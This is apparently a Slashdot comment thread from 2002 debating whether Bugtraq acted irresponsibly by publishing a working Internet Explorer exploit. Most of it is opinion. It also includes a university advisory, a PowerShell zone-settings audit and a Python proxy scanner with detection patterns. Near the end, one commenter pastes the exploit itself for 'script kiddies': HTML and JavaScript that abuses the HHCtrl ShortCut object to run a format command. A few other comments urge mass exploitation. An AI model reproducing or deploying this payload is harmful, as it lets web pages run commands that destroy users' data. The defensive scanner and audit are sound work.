Controversy Surrounds Huge IE Hole
Suchetha wrote in with a Wired News bit talking about a security hole in IE that allows malicious web pages to reformat a hard drive. The Wired piece talks more about Bugtraq's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
If they cared about preserving security for users, or getting the defect fixed, they'd have given the working code exclusively to the defect owner. Posting working malicious code to the general population serves NO BENEFIT to anyone other than those with malicious intentions. You can properly describe 99.99% of bugs without giving people the tools to take advantage of it.
The Wired piece talks more about Bugtraq's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
Easy question to answer.
If Linux had an exploit that allowed someone to ssh into your box, su to root, then fsck your hard drive, and a patch wasn't released yet, would you be pissed off that bugtraq posted the code to exploit the bug?
Don't say "it'll never happen," cause anything is possible.
Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
That's freakin' craziness..... hmmm, where's that Mozilla download site again...
The Wired piece talks more about Bugtraq's handling of the whole thing...
Dude; since when did Lain start writing technical articles?
It might be my sadistic side, but I prefer for working exploits to be posted by the security sites... It gives you a way of checking to see if you are vulnerable.
In the case of M$ bugs, it also puts more pressure on the company to come up with a fix for the problem quickly.
the irresponsibility lies with the company who released IE - with huge holes. once the holes are found, it is then their job to release patches, no?
ok, ok, it's redundant, but someone had to say it again.
The article states that the code wasn't new, and was taken from public forums etc. So I don't really think that this is irresponsible..
Thanks for not posting a link to that page.
http://dtum.livejournal.com
What may be MORE irresponsible is /. posting a link to Wired posting a link to the exploit for all the l33t script kiddies here.
No, wait... there's no script kiddies here. Only hax0rz with K-rad XP boxen.
-- El Sacarino tiene gusto de la chocha
I cannot help but notice that in almost all cases, the security problems in both IE and Mozilla have been in the realm of active content - Javascript, Flash, and ActiveX.
Hence why I disable them as a matter of course.
How about encouraging webmasters and web designers to avoid requiring them unless absolutely necessary?
www.eFax.com are spammers
Ok, so they acknowledge that Microsoft has known about the problem since November. But the messenger is still the one that should be shot. And not Microsoft, since they are "investigating the issue".
...
The article is just stupid
here
http://www.onid.orst.edu/~boyechky/open.html
I would rather have my hard drive formatted. -S
We Apprentice Developers and Designers
Had BugTraq not posted this code then what proof would they have to take to Micro$oft. After all, the people that want to utilize that code are going to be able to find it anyway. In my opinion this merely makes Micro$oft responsible for their product and hopefully will lead to the quicker introduction of a patch. Or, God forbid, it could entice people to use a different web browser.
Memories become legend, Legend fades to myth, and even myth is forgotten by the time that age comes again.-Robert Jordan
[sarcasm]..script kiddies! These 3733t haX0rz need Bugtraq to tell them how to do things, step by step.[/sarcasm]
Of course, if Microsoft was really worried about "Secured Computing" and not "Secured Profits" things like this would never happen.
MunITioN
"A mind is a terrible thing to lose"
Those who think, "We should give MS a couple months to find an appropriate patch" are sadly misguided. Do you think a script kiddie or hacker is going to wait? Do you think they're going to say "Oh, I shouldn't do this because Microsoft is a big company." Wake up people, the only way a company is going to put their top programmers on the job to fix the bug is when the threat moves from "possible" to "real". As much as I wish companies took exploits more seriously, the reality is they don't until it is perceived as a "real immediate threat."
I think BugTraq was irresponsible posting working code for the exploit, but I also think the point is academic.
After all, if some script-kiddie wanted to exploit this, they'd just find the working code somewhere else.
I'm too lazy to think of anything to put here.
"The new information enabled me to add to some rudimentary precautions I'd taken previously based on earlier information," said Gary Flynn, a security engineer at James Madison University. "But, of course, it also made it easier for others to take advantage of the situation."
That's very nice for the well informed, but unfortunately,
{people who take rudimentary precautions} is tons smaller than {people who have no idea, and who might get hacked}
I don't see how having the code broadcast to the entire world so that people could make very basic (but non-default) IE settings changes was worth the trade-off of having all the people who don't know enough to take these precautions (read everybody who doesn't follow bug or exploit lists) potentially get hacked.
Posting as Anon since I don't need the Karma:
----------
Serious Internet Explorer Defect
This is a developing issue and the information presented here is preliminary in nature and subject to frequent changes. Last significant update - 11/08/02-1830
SUMMARY
A simple way to exploit an unfixed defect in Internet Explorer has been discovered that allows malicious web sites, and possibly malicious email messages read with Outlook or Outlook Express, to take control of a computer. All you would need to do is click a web link and the owner of the web site could take almost any action they desired on your computer.
Simple, working exploit software was recently published to a public mailing list.
There is no patch to fix the problem. Anti-virus and personal firewall software will not prevent an exploit. It is hoped that Microsoft will provide a patch to fix this defect in the near future.
It is impossible to predict how, when, or even if someone will take advantage of this but due to the ease with which bad things can be accomplished it was decided to post an announcement. Nothing at all may happen. Or someone could write a virus or put up a malicious web site to take advantage of the situation at any time. The last time a defect exploit with similar characteristics was published, it was quickly incorporated into many email viruses making it unnecessary to click an attachment to get infected.
The following practices are recommended for users of Internet Explorer, Outlook, and Outlook Express until more information becomes available:
1. Users of Outlook and Outlook Express should perform the following simple, unobtrusive procedure to disable scripts from executing in email messages:
Click the Tools menu item and select Options
Click the Security tab
In Outlook Express, make sure the Virus Protection security zone is set to Restricted site zone as shown in the window below:
In Outlook, make sure the Secure Content Zone is set to Restricted Sites as shown in the window below:
These are the default settings for Outlook 2002 and Outlook Express 6. Users of earlier versions should change the setting to Restricted.
2. Indiscriminate browsing of untrusted or questionable web sites should be avoided or scripting should be disabled as described in the additional security measures below. Note that hyperlinks sometimes appear in email or instant messages. If these messages are from malicious individuals, they could lead you to a malicious web site.
3. Indiscriminate clicking of hyperlinks in unexpected or suspect email messages, instant messages, and peer sharing resources should be avoided or scripting should be disabled in Internet Explorer as described in the additional security measures below.
ADDITIONAL SECURITY MEASURES AND INFORMATION
There is only one technical defense against an exploit at the present time and that is to disable scripting in Internet Explorer, Outlook, and Outlook Express. Instructions for disabling scripting in the mail clients were included in the recommendations above and should have little or no effect on day to day use.
Unfortunately, disabling scripting in Internet Explorer will adversely affect the operation of many web sites including E-campus and the Windows Update Site. There is, however, a way to specify trusted web sites that are allowed to use scripting and disable it for all others. Users desiring to decrease risk may follow the instructions at the following web site under the section titled "Optional Internet Explorer Security Measures":
http://www.jmu.edu/computing/info-security/engineering/issues/ie.shtml#opt
Risk associated with this exploit and most others can be somewhat reduced by using a non-Administrative Windows account when browsing the web, reading email, and other day to day computer use.
The defect has been verified in Internet Explorer 5.5 and 6 SP1 running on Windows 98 and XP SP1 respectively. It is likely all varieties of 5.5 and 6 are vulnerable. A quick attempt on a Windows 95 computer running IE 5.0 was unsuccessful but not enough research was done to know why.
A possible symptom of an exploit is a window similar to the one below suddenly appearing on your screen after clicking a hyperlink or opening an email message. The exact appearance of the window may vary depending upon the version of Internet Explorer and operating system. Note that this window will appear if you click Help, and under that circumstance the window's appearance is not an indication of an exploit. If you are affiliated with James Madison University and see this window unexpectedly appear after clicking a web hyperlink or reading an email message, please contact Gary Flynn at x82364 ASAP. People affiliated with James Madison University can find my home number in the local directory and are encouraged to call me at home if such an event takes place after normal working hours.
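An added example, not from the advisory or from anyone in the thread: a PowerShell audit of the per-user Internet Explorer zone settings that the advisory's workaround (scripting off for the Internet zone, on only for explicitly trusted sites) and its non-Administrator advice depend on. It assumes the documented zone numbering under HKCU (0 My Computer through 4 Restricted sites), the documented action value 1400 for "Active scripting" (0 enable, 1 prompt, 3 disable) and the ZoneMap\Domains layout for Trusted sites; the function name Get-ZoneScriptingState is mine.

```powershell
# Audit IE security zones against the advisory's recommendations.
# Assumptions (documented IE registry layout, not taken from the page):
#   Zones\0..4 = My Computer, Local intranet, Trusted sites, Internet, Restricted sites
#   value 1400 = Active scripting; 0 = enable, 1 = prompt, 3 = disable
$zoneBase  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$zoneNames = @{ 0 = 'My Computer'; 1 = 'Local intranet'; 2 = 'Trusted sites'; 3 = 'Internet'; 4 = 'Restricted sites' }
$meaning   = @{ 0 = 'Enabled'; 1 = 'Prompt'; 3 = 'Disabled' }

function Get-ZoneScriptingState {
    # Hypothetical helper: returns the Active scripting state of one zone as text.
    param([int]$Zone)
    $key = Join-Path $zoneBase $Zone
    if (-not (Test-Path $key)) { return 'Zone key missing' }
    $v = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'1400'
    if ($null -eq $v) { return 'Not set (IE default applies)' }
    if ($meaning.ContainsKey([int]$v)) { $meaning[[int]$v] } else { "Unknown ($v)" }
}

foreach ($z in 0..4) {
    '{0,-16} Active scripting: {1}' -f $zoneNames[$z], (Get-ZoneScriptingState -Zone $z)
}

# The advisory's only technical defense is scripting disabled for untrusted sites.
if ((Get-ZoneScriptingState -Zone 3) -ne 'Disabled') {
    Write-Warning 'Active scripting is not disabled in the Internet zone.'
    # To apply the advisory's measure for the current user (uncomment to use):
    # Set-ItemProperty -Path (Join-Path $zoneBase 3) -Name '1400' -Value 3 -Type DWord
}

# Sites the user has placed in Trusted sites (ZoneMap value 2) keep scripting on,
# so list them: subkeys are stored reversed, e.g. Domains\example.com\www = www.example.com
$domainRoot = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains'
if (Test-Path $domainRoot) {
    Get-ChildItem -Path $domainRoot -Recurse | ForEach-Object {
        $rel   = $_.PSPath.Substring($_.PSPath.IndexOf('\Domains\') + 9)
        $parts = $rel -split '\\'
        [array]::Reverse($parts)
        $hostName = $parts -join '.'
        $props = Get-ItemProperty -Path $_.PSPath
        foreach ($p in $props.PSObject.Properties) {
            if (($p.Name -in 'http', 'https', '*') -and ([int]$p.Value -eq 2)) {
                "Trusted site (scripting stays enabled): $($p.Name)://$hostName"
            }
        }
    }
}

# The advisory also recommends day-to-day use from a non-Administrative account.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]$identity
if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Warning "$($identity.Name) is browsing as an Administrator; a code-execution bug in IE runs with full rights."
}
```

Machine-wide policy keys under HKLM can override the per-user values read here, so an "Enabled" result is only conclusive when no such policy is in force.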
I mean, c'mon, what's the likelihood tha - C:\>FORMAT C:\ *bbbzzzzzzzt*
oh crap.
"Old man yells at systemd"
Who would have thought Microsoft would provide such low level functionality in their browser?
Mozilla probably won't let you format a hard drive.
Just one more shining example of the superiority of closed source....
</sarcasm>
The only huge hole I've seen in IE is at goatse.cx...
-gerbik
is insecure.
Only people who need that information should be allowed access to it. That's why only something like bugzilla really works well with a product that is likely to be subject to exploits - only the people who are developers of the relevant piece of code are admitted into the security exploits section.
If that kind of info is posted openly on the web, I fail to see the difference between that and stupid pages that always post activex exploits thinking they're cool hax0rs. Cool hax0rs don't post exploits, they fix them.
Join the elite! Post at score:2! Ghostwheel is online.
The information was already out there.
Would you rather let the "bad guys" have it and not know about it?
The argument against suppressing such information just never holds up, because it is the public dissemination of such information that cajoles companies such as Microsoft to publish security fixes.
Even so, Microsoft is still too slow to address security flaws and does an exceedingly poor job of communicating them to the public.
If I don't know what the malicious code is, how am I supposed to avoid it?
Informed security is way better than uninformed security.
Anyone who wants to use this exploit will find out how. The exploit-users already know how to use it and will tell their friends, so we may as well know also.
"Since November"? Today is November 19. The statement "since November" does not give any information, except that MS was informed at most 18 days ago.
Yet another reason to switch to Opera.
I started using Opera 6.05 a few weeks ago, and am quite pleased with the speed and features. Sure, in like the thousands of web-pages I've surfed, there were like 2 that I couldn't browse, but that's no problem.
If you are looking into Opera, I suggest waiting until version 7 comes out (should be soon). The beta for version 7 looks awesome, but it's still pretty buggy. It also comes with an email client that's supposedly pretty good too.
a.) Run Microsoft exclusively (only want to see Microsoft bugs)
b.) Run Microsoft exclusively (don't want to see Microsoft bugs)
c.) Want to find any reason to bash Microsoft... (only want to see Microsoft bugs
d.) Don't run Microsoft at all (don't care about Microsoft bugs)
Now, this may sound on the surface like an M$ slam, however that is not my intention here (as much as I dislike that company).
M$ has shown, in the past, that it is very unresponsive at times to reported security vulnerabilities. Sure, the proper thing to do would be to send the vulnerability details to M$ and have them fix it. The problem is that M$ sometimes sweeps such stuff under the rug: "Oh, no one else knows, so we can put this one off." By posting the code, it is quite possible that M$ will be forced to deal with the issue now. I don't agree with the method taken here, but considering M$'s track record on this, this may be the only way to get it taken care of quickly.
Be excellent to each other. And... PARTY ON, DUDES!
I think the ultimate entity responsible is the company that makes the flawed program. If there is no bug, there is no code exploiting the bug on a website. The bug exists and can be exploited, whether the code is posted or not.
I'd say it's really no better or worse than, say, Slashdot posting links to warez.
I usually try not to sound insulting, but come on... if you're still using Internet Explorer then you are honestly being stupid.
Try Mozilla or one of its derivatives; my favourite is Phoenix. Another fine piece of software, independent of both IE and Mozilla, is Opera.
I know some people will probably moderate me down for this, but I don't care.
Like the title says: I am not surprised. Microsoft probably has the poorest security track record of any software publisher out there.
Maybe Bugtraq has not been very serious in its handling of this security hole, but, honestly, using Microsoft operating systems or applications without a ton of additional security software (antivirus, firewalls, etc) is asking for trouble.
In my opinion, Bugtraq is not responsible: Microsoft is. If you use Microsoft products, do as I do: do not use IE (I use Opera or Mozilla), do not allow any application to have access to the Internet without authorization (I use Zone Alarm), do not use Outlook for email (I use Pegasus Mail) and install and update an antivirus program religiously (I actually use two).
Two, out of my 4 personal machines at my home, use either Linux or OpenBSD. One is a Windows 98 machine. The last is being rebuilt and will become a NetBSD workstation. And there is a reason for it: Microsoft security (or rather lack of).
Now, flame all you want. =)
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Too many companies (software vendors, security consultants) are financially vested in how bad the security blackeye looks in the marketplace and it colors their policies regarding security notification.
As far as I'm concerned, the interests of the software users should be the primary concern.
"Provided by the management for your protection."
BugTraq is a mailing list dedicated to full disclosure. Before I get modded down for being redundant, let me explain how/why this is relevant. In a list dedicated to full disclosure, it becomes up to the person who drafts the advisory to be responsible for its content. Many companies believe that vendor notification before releases is standard procedure, and yet there are others (ISS) who seem to believe that having one non-vulnerable version (bind 9) means that they can release an advisory that affects other versions that currently have no patches (bind 8, 4).
On the other hand, there are "independents" such as GOBBLES and other security goons who believe that posting the advisory with full exploit code the second they discover it is a good idea. I'm not going to disagree with that, because without such wake-up calls, many people would never update their systems, remaining vulnerable for days/months/years. It's pretty ridiculous how many people do.
It's not really up to BugTraq to decide which is the better course of action, it's up to the analysts and the community. If the community chooses to ostracize a member for using such tactics, they can do so. I'm sure that a commercial security vendor would encounter exactly that for releasing an advisory with exploit code and no vendor notification.
Though, in all fairness, most people have known about this IE exploit for months, and I can be reasonably sure that among "most people" "Microsoft" is included. Microsoft doesn't exactly have the world's best track record working with people to resolve security issues, or even releasing timely patches.
In short, BugTraq good, security good, black hats bad.
If there is a God, you are an authorized representative. - Kurt Vonnegut Jr.
Certainly, making sure someone is aware of an issue with their software should be paramount before telling others. Alas, big corporations often just don't care, which is a disgrace.
However, whilst there's something to be said for fighting such companies, I fail to see why it should be at the user's expense.
Lots of people use windows. Some like it. Some hate it. Some, like me, have very little choice in the matter - finding a job elsewhere is simply not a realistic option. Now, why should I be punished over a vendetta?
Take a look at the PHP exploits released a few months ago. You were talking total server compromise. Were there any exploits? Certainly, but you would have a damn hard time actually finding them.
Right now, alas, there's a chance that my machine will be erased, losing work that hasn't been backed up because that's what I've done in the mere last few hours.
Think of the users. Please.
What's irresponsible is that MS missed a glaring hole like this in their browser. Does MS even have a QA department? I didn't think so. I fully support someone posting exploit code. All it does is give more reason for people to move to Mozilla and hate IE even more.
Basically this is the same as another exploit posted to the list earlier, but with a new command. And for that matter, jelmer has been posting a new IE local zone exploit like every week... Any of them could have been used to make something like this, it's just no one has tried to do a format. True the jelmer posts didn't include the "run a program with arguments" thing that was posted this week, but they did show how to read/write arbitrary files and execute them. So batch file somewhere and here comes a HD format.
So the only reason we haven't seen this I think is because like always, virus creators want their program to spread, and the quickest way to stop the spread is to kill your host, so instead we get mass mailers, trojans, etc. It was going to happen eventually.
Maybe now they'll stop A. forcing us to use IE and B. giving us Root XP userIDs. I keep kvetching about this but maybe a major hole like this will get their attention. . .
You are not the customer.
I don't think it was irresponsible for the bug to be posted and described in the manner it was. The more clues you give out, the more likely someone will figure it out, and exploit it. It's not like they were writing a proggy for the scriptkiddies.
Better to be out with the whole thing, and put pressure on MicroSoft to fix it, than to be cryptic about it.
Another day, another mack-truck sized hole in an MS product. People sound surprised by this... =P
Julie Moult is an idiot.
I think it's hardly irresponsible; I consider it merely posting the redistributable fix to the problem along with the notice that it exists.
members are seeing something, you're seeing an ad
My C++ documentation also has code that shows how to format disks. Are THEY irresponsible too? ....the blame should be put where it belongs.....
dan.
Imagine how quick that would wipe on a Beowulf cluster running Wine - like er wipeeeee
...you are the one irresponsible.
"If you have done 6 impossible things this morning, why not round it off with breakfast at Milliways" -- hhgg
People who want to do malicious things to your computer will find a way, whether or not the exact code is posted to popular web sites. Software companies have the responsibility to publish fixes to bugs, especially in a timely fashion. Microsoft tends to delay patches to their programs.
It has been proven time and time again that MS does not care about fixing their bugs or securing their users. Their only concern is furthering their illegal monopoly position by abusing the political system of America.
That leaves us with each other as our ONLY protection. Personally, I WANT to know if users in my network are able to accidentally destroy their computers, and I NEED to know how the problem occurs so I can help avoid it. As I already stated, if we can not help each other get past the problems, then malicious programmers will have already won; that's just the MS world. Trusted computing is between users, not with the vendor in these dark times.
This exploit has been around for over a year now. I consider any highlighting to the masses as responsible given the amount of people who know about it already.
but...(you knew the "but" was coming, right?)
Is it really any more irresponsible than running IE in the first place? How many more of these browser exploits have to happen? A part of me almost hopes someone does exploit this and do nasty things with it JUST SO PEOPLE WON'T BE DEPENDENT ON IE ANYMORE. Friends don't let friends use Internet Explorer.
I think the word needs to be spread: Anyone who uses IE isn't an innocent bystander, but someone who knowingly uses a defective and dangerous product. IE Users are no better than people who own Ford Explorers and kept the old Firestones because they don't want to go through the trouble to get them changed.
So, all you other geeks out there, when you're visiting family over the upcoming holidays and they inevitably ask you to fix something on their computer, install Mozilla (or Opera, or even Netscape) and set it as the default browser. When they ask why, tell them it's because IE is a dangerous and defective product.
Now all we need is a way to embed an ISO image of a Linux system into the web page and use the same exploit to install an alternative operating system. Just think of the banner ads! "Click here to Install Linux!" and "Get That Windows Monkey Off Your Back! Hit the Monkey to Try!" and "Eliminate Windows Instabilities Forever. Click Now!". Then it won't be malicious. It'll be setting all those people FREE!
Curmudgeon Gamer: Not happy
Malicious code is out there for the taking from any number of sources. It's not a case of finding and identifying malicious code anymore. It's about letting the most people know about it. If they erred it was by not spreading the word broadly enough.
"Consensus" in science is _always_ a political construct.
Since Outlook Express formats HTML code that is sent automatically, and I assume uses the same engine Explorer does, could it be possible to send a spam email that will re-format the hard drives on all IE Windows systems? Scary.
You have to admit, since /. posted a story about it the knowledge of this has skyrocketed.
They do call it the slashdot effect for a reason, you know? Sites only get slashdotted because everyone and his brother goes to take a peek at what the fuss is about.
is why on my computer, IE doesn't even have permission to get through ZoneAlarm
Technoli
Just imagine what would happen if someone combined this hack with the blackops IP techniques discussed in prev /. article... could someone effectively wipe ALL the drives and servers running windows on the net?... do you think people would come down on MS then???
I think that if this is left unpatched, then those in the hacker community almost have a responsibility to fully exploit this... just to force a patch to be released... reformatting 2^32 computer systems would get their attention, even if congress can't.
The Code Ninja is swift with his tool, precise in his delivery, and deadly accurate in his execution.
They need to hire on Britney. "Oops, I Did It Again"
seems like the fun just never stops in MS land.
just noticed all my typos. good thing I don't proof read until it's too late :P
For a minute I was worried that google searching wouldn't be safe anymore because there was a real threat of something erasing my hard drive. Then I realized, hey, it's an IE security hole, I can still run Moz in Win and wait until a fix.
The GeekNights podcast is going strong. Listen!
I just tried using the exploit code on my Mac OS X box running Internet Explorer and it didn't work. My hard disk was not formatted. I am disappointed. Why is Microsoft treating Mac users different than Windows users? It's not often that Mac OS X users get to use those nice 'Recovery CDs' that get shipped with Macs. We pay top dollar for our computers, we might as well get to use everything that comes with them. Thanks a lot Microsoft! Just for leaving me out, I'm switching to Mozilla, where all the security problems and bugs are cross platform!
Strange women lying in ponds distributing swords is no basis for a system of government.
From the article:
"To disclose or not disclose -- it's a question that's been under heavy discussion in the computer security industry over the past year."
I think it's fair to say this debate has been raging for at least as long as Microsoft has been in existence.
My
Limekiller
Wow, I downloaded Mo, I was thinking about switching, and now I've officially decided. In case anyone needs any more coercion, this is your truth serum.
"Martha Stewart can lick my Scrotum......do i have a scrotum?" -- Sharon Osbourne
Is that the one spinning out of control gobbling up dying suns ? Oops! misread that. It's Microsoft, not a black hole (BBC news link) http://news.bbc.co.uk/1/hi/sci/tech/2490075.stm
Funny how this article links to the post made by the person who discovered the exploit and HIS CODE on how to do it. Who's the responsible reporter now?
I...uh...want to see if they are...are as numerically diverse as mine! Yeah..that's it!
Neither this incident nor the wired story adds anything new to the debate.
It's really gotten quite tiresome. Neither side of the "full-disclosure" flame war will ever convince the other, so I imagine it will continue forever.
Keep in mind that bugtraq was specifically created to be a full-disclosure list. It's a central element of their charter. The moderator is therefore highly motivated not to block something on the grounds that it reveals too much information.
If you think that's irresponsible, there's no need to vent about it here. You can read hundreds of megabytes of archived debate on the subject. I'm quite sure whatever argument you want to present will be in there somewhere.
This isn't even a particularly good example to use, since the exploit was already public.
Let's see.. this exploit combined with a bind exploit equals a huge number of "windows updates".
Professor Lirpa, of Lirpa Labs, describes the current shortage as not having much environmental impact. "It should only affect hard drive manufacturers. They consume the free supply in the normal course of manufacture. Then once the new drives are used, the Formatium is released back into the atmosphere in its gaseous form. This is why disk drive enclosures have those little vent holes."
He continued, "Don't ever take a virgin drive, cover the hole and then install an OS. You risk explosion. Particularly if you use a bloated commercial OS. One commercial OS actually renamed itself in an attempt to forestall disaster by reminder. You really should open some windows."
There is some speculation that the upcoming shortage was expected by the drive manufacturers, leading them to reduce the period of warranties they offer on newer products.
All my previous sigs now look like this one, I wish they were permanently recorded when used.
Did they solve it yet?
If not, then give them a break.
It is November now, did they know this since last November?
What is this, my other machine is reformatting. . . LOL
However, their methods are suspect. There had to be a better way to handle this. Posting the exploit code encourages the use of that code, no matter what the motive for posting the code.
IANAL... But I play one on
So if you're using a Windows box, I've got to assume one of three things is happening:
And, yes, it would be different if this were Linux, or BSD, or even MacOS. All those operating systems come with companies or communities who take security seriously, and they respect their users enough to not foist insecure features on them. You can have the reasonable expectation that running any of those OSes lets you worry about security a lot less than running a Windoze variant.
If you had a nice apartment in the middle of New York, and you constantly left the front door unlocked, and then one day somebody walked in stole your stereo, I'd feel bad for you. But, you know, not too bad.
Do domain names matter?
thank gawd I just installed this puppy last night
Now will this exploit work with IE6 or 5.5 running in Wine? Did/can anyone check this?
Also IMHO if the company like Microsoft is irresponsive to security holes in their programs the people that discover those holes have every right to publish them. Then and maybe then the vendor will do something because it is forced to do it.
Is this security hole a feature or a bug?
As long as MS keeps insisting that these gaping security holes are a required feature, it is their fault.
They made a mechanism for running arbitrary code on my computer, and apparently didn't take any reasonable means to ensure the security of that mechanism, it is their fault, they should fix it.
Sure, I can always reach my box at 127.0.0.1
Strange women lying in ponds distributing swords is no basis for a system of government.
In the words of a good friend of mine.. and he probably stole them somewhere else - security through obscurity isn't.
/ Per
Here's some more info... click this link it's ok.. you can trust it... go on.. you know you want to.
Nothing to fear. Just a link.
Has anyone ever cracked a medium or large web site's front page, and instead of defacing it added an exploit such as this? Some pretty popular web sites have been cracked before. If a hard drive formatting script hasn't been put onto a major site yet, is it just a matter of time?
I imagine that it would wreck quite a few computer novices' computers.
And possibly -1 RTFE (Exploit).
The advisory quoted only points out how it is possible to combine already well-known OTHER exploits into a way to run commands with parameters in the local context.
Also, last time I checked, you could not format a hard drive just by typing "Format C:". You also have to type "yes" two or three times, quote the volume label back to the FORMAT program, and a couple of other safeguards. Saying that "Web sites format your hard drive" is sensationalism. Yes, they can run programs on your hard disk. (We've seen these kinds of sploits before. They're bad, yes, but not new.) But can it format your hard drive? Not so.
It should also be noted that the exploit paper points out that the author has discovered another way to achieve the same effect, but that details will not be disclosed until the vendor (MS) has patched the problem.
I don't think it is irresponsible (at least not of the magnitude suggested) to quote others' works and say that the vulnerabilities still exist.
Does anyone know if this is the same bug that was fixed in grc.com's XPdite program? That's described as an XP bug, whereas this is described as an IE bug, but there's not enough info to be sure.
There was already working code posted that exploited the vulnerability but did not format your drive. There was no need to add that payload to the exploit. It's like handing out a vaccine that you have modified to have worse side effects than the original disease.
--
E_NOSIG
This is the original code from the bt post, for all you s/k's out there....
/autotest';
) ");;
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a:
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:'
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();")
close();
}
</script>
<body>
<h1>Testi ng IE Execute Exploit</h1>
</body>
</html>
uNF!@#
Someone said MS has known about this for weeks and still there is no fix. MS should have released a fix for this immediately.
Perhaps by giving so much information, MS will get off its lazy rear. There is no excuse for MS not having a fix for this released by end of business today. Anything less is simply inexcusable.
Yes, there is a LOT of work involved here. They need to identify the problem, find a solution, implement the fix, test the fix, and then release the fix (with several iterations of implement/test). However, they really should have had people working around the clock on this starting the very minute they found out about it.
Screw viruses... this is perfect... send your victim an email with a link to your exploited page, and boom! And to think this is all possible thanks to M$!
New M$ motto: we fuck up so you have to!
"Some fight for law. Some fight for justice. What will you fight for? One day, you will see."
I'm not sure about the details of the current case, but there is a very good reason for publishing full technical details about an exploit before patches come out. That is that it may be possible in many circumstances for aware and knowledgeable system administrators to prevent the exploit from affecting machines within their control either at a central point, like a firewall or proxy, or by disabling software features until a patch is available.
For example a web proxy might be able to scan for the presence of the malicious code in question, but if that code is not available to the sysadmins, then how can they make appropriate filters? Also being aware of the ways in which these exploits work could allow sysadmins to make more general security policy decisions in terms of what users / processes are allowed to access what areas, etc. I'm not saying that it could be done in this case, but could in many others.
This could save a company a lot of time and money, and is therefore a good thing. It is not true to say that only the party responsible for producing a patch needs to see the actual code for security reasons.
There are a thousand forms of subversion, but few can equal the convenience and immediacy of a cream pie -Noel Godin
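The post above argues that a web proxy can only filter for an exploit if admins know what it looks like. As an added example (not from the original thread or from any advisory), here is a small Python content scanner that keys on the combination of markers quoted in the thread's exploit listing (the HTML Help showHelp call, the .chm file, the mk:@MSITStore protocol, the HHCtrl object classid with a ShortCut command, and shell arguments mentioning format); the sample pages and the verdict thresholds are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Markers taken from the exploit code quoted in this thread. No single one is
# malicious on its own (help files legitimately call showHelp on a .chm), so
# the filter scores the combination rather than any individual match.
INDICATORS: Dict[str, re.Pattern] = {
    "htmlhelp_call": re.compile(r"showHelp\s*\(", re.I),
    "chm_file": re.compile(r"\.chm\b", re.I),
    "itss_protocol": re.compile(r"mk:@MSITStore", re.I),
    # HHCtrl ActiveX classid used in the quoted listing.
    "hhctrl_object": re.compile(
        r"classid\s*=\s*[\"']?clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11", re.I),
    "shortcut_command": re.compile(
        r"<param\s+name\s*=\s*[\"']?Command[\"']?\s+value\s*=\s*[\"']?ShortCut", re.I),
    # A shell program name followed (within a short distance) by a format command.
    "shell_args": re.compile(r"\b(command|cmd)\b[^<>]{0,40}\bformat\b", re.I),
}


@dataclass
class ScanResult:
    matched: List[str]
    score: int
    verdict: str  # "allow", "review" or "block"


def scan_html(body: str) -> ScanResult:
    """Score one HTML body against the indicator set and return a verdict.

    Policy (constructed for this example):
      block  - the HHCtrl object AND a ShortCut command are both present;
               this is the pair that actually launches a program.
      review - the ITSS protocol appears, or three or more markers match.
      allow  - anything weaker, which covers ordinary help-file pages.
    """
    matched = [name for name, rx in INDICATORS.items() if rx.search(body)]
    score = len(matched)
    if "hhctrl_object" in matched and "shortcut_command" in matched:
        verdict = "block"
    elif "itss_protocol" in matched or score >= 3:
        verdict = "review"
    else:
        verdict = "allow"
    return ScanResult(matched, score, verdict)


def scan_pages(pages: Dict[str, str]) -> Dict[str, str]:
    """Map each fetched URL (hypothetical keys) to its verdict, as a proxy hook would."""
    return {url: scan_html(body).verdict for url, body in pages.items()}


# Constructed sample pages: a legitimate help page, a page that only reaches
# into the ITSS store, and a page wiring the HHCtrl ShortCut chain together.
BENIGN_PAGE = """<html><body>
<a href="manual.chm">Product manual</a>
<script>function help() { showHelp("manual.chm"); }</script>
</body></html>"""

SUSPICIOUS_PAGE = """<html><body>
<script>showHelp("iexplore.chm");
location.replace('mk:@MSITStore:C:');</script>
</body></html>"""

CHAIN_PAGE = """<html><body>
<object id=c1 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<param name=Command value=ShortCut>
<param name=Item1 value=",command,/k format a:">
</object>
</body></html>"""

if __name__ == "__main__":
    for url, body in {"http://example.invalid/help": BENIGN_PAGE,
                      "http://example.invalid/odd": SUSPICIOUS_PAGE,
                      "http://example.invalid/chain": CHAIN_PAGE}.items():
        r = scan_html(body)
        print(f"{url}: {r.verdict} (score {r.score}, matched {r.matched})")
```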
Shoot the messenger. Then sue the survivors.
it's your own responsibility to take care of your box. I dont want security through obscurity, so I dont care if someone posts exploits (especially if this helps in diagnosing/resolving the problem for patchers).
In the meantime, I can just avoid the use of that piece of software.
Hey Slashdot, you could have become famous if you'd included the controversial html embedded in the post ;-)
I believe posters are recognized by their sig. So I made one.
Check This Out!
I don't think anyone really has to go freak out quite yet. On an average day I don't visit a whole lot of unknown and untrustworthy websites. The chances of the odd one actually putting the malicious code to use are small. If you see a link like the one above - DON'T GO TO IT!
Microsoft:"We trust you not to tell anyone about our security holes if you find them"
